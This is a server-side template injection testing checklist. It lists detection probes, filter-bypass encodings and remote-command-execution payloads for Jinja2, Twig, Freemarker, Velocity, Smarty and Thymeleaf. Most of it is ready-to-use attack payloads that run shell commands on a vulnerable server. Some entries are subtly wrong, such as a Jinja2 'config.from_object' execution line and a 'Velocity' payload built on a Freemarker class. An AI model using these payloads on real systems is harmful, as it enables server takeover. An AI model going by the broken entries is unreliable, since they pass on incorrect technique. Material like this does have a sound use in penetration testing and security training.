Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

  1. Initial Information Gathering

    • Identify and map all endpoints that accept user input for template rendering.
    • Review source code (if available) to understand template rendering mechanisms.
    • Check for user inputs in templates, URLs, headers, and request bodies.

  2. Basic SSTI Testing

    • Test common SSTI payloads to identify template engine and injection points:
      • {{7*7}}
      • ${7*7}
      • <%= 7 * 7 %>
      • #{7*7}
      • Try injecting payloads in different user inputs (e.g., form fields, query parameters).

  3. Detecting Template Engines

    • Identify the template engine by using specific payloads for known engines:
      1. Jinja2 (Python):
        • {{7*'7'}}
        • {{config.items()}}
      2. Twig (PHP):
        • {{7*7}}
        • {{_self.env.globals}}
      3. Freemarker (Java):
        • ${7*7}
        • ${"freemarker.template.utility.Execute"?new()}
        • <#assign ex = "freemarker.template.utility.Execute"?new()>
      4. Velocity (Java):
        • #set($x = 7 * 7)
        • $class.inspect("java.lang.Runtime").newInstance().exec("ls")
      5. Smarty (PHP):
        • {$smarty.version}
        • {if 7*7}
      6. Thymeleaf (Java):
        • ${7*7}
        • th:text="${T(java.lang.Runtime).getRuntime().exec('ls')}"

  4. Payloads

    • Test payloads that can bypass filters and restrictions:
      • {{7*'7'}}
      • ${7*'7'}
      • <%= 7 * '7' %>
    • Use concatenation to bypass filters: {{7*('7')}}, ${7*('7')}
    • Inject payloads in nested contexts to test for complex injections.

  5. Exploiting SSTI

    • Test for code execution:
      • Python (Jinja2): {{config.from_object('os').popen('ls').read()}}
      • PHP (Twig): {{_self.env.globals.system('ls')}}
      • Java (Freemarker): <#assign ex = "freemarker.template.utility.Execute"?new()> ${ex("ls")}
      • Java (Velocity): #set($x = "freemarker.template.utility.Execute") $x.new().exec("ls")
      • PHP (Smarty): {system('ls')}
      • Java (Thymeleaf): th:text="${T(java.lang.Runtime).getRuntime().exec('ls')}"

  6. Bypassing Input Validation

    • Test for input validation bypass using encoding and escaping:
      • URL encoding: %7B%7B7*7%7D%7D
      • HTML encoding: &#123;&#123;7*7&#125;&#125;
    • Use different template syntax to bypass filters:
      • {{7*7}}
      • ${7*7}
      • <%= 7 * 7 %>

  7. Error Handling and Response Analysis

    • Analyze server responses for clues about SSTI vulnerabilities.
    • Look for error messages that disclose template engine details or execution errors.
    • Verify if application stack traces are exposed in responses.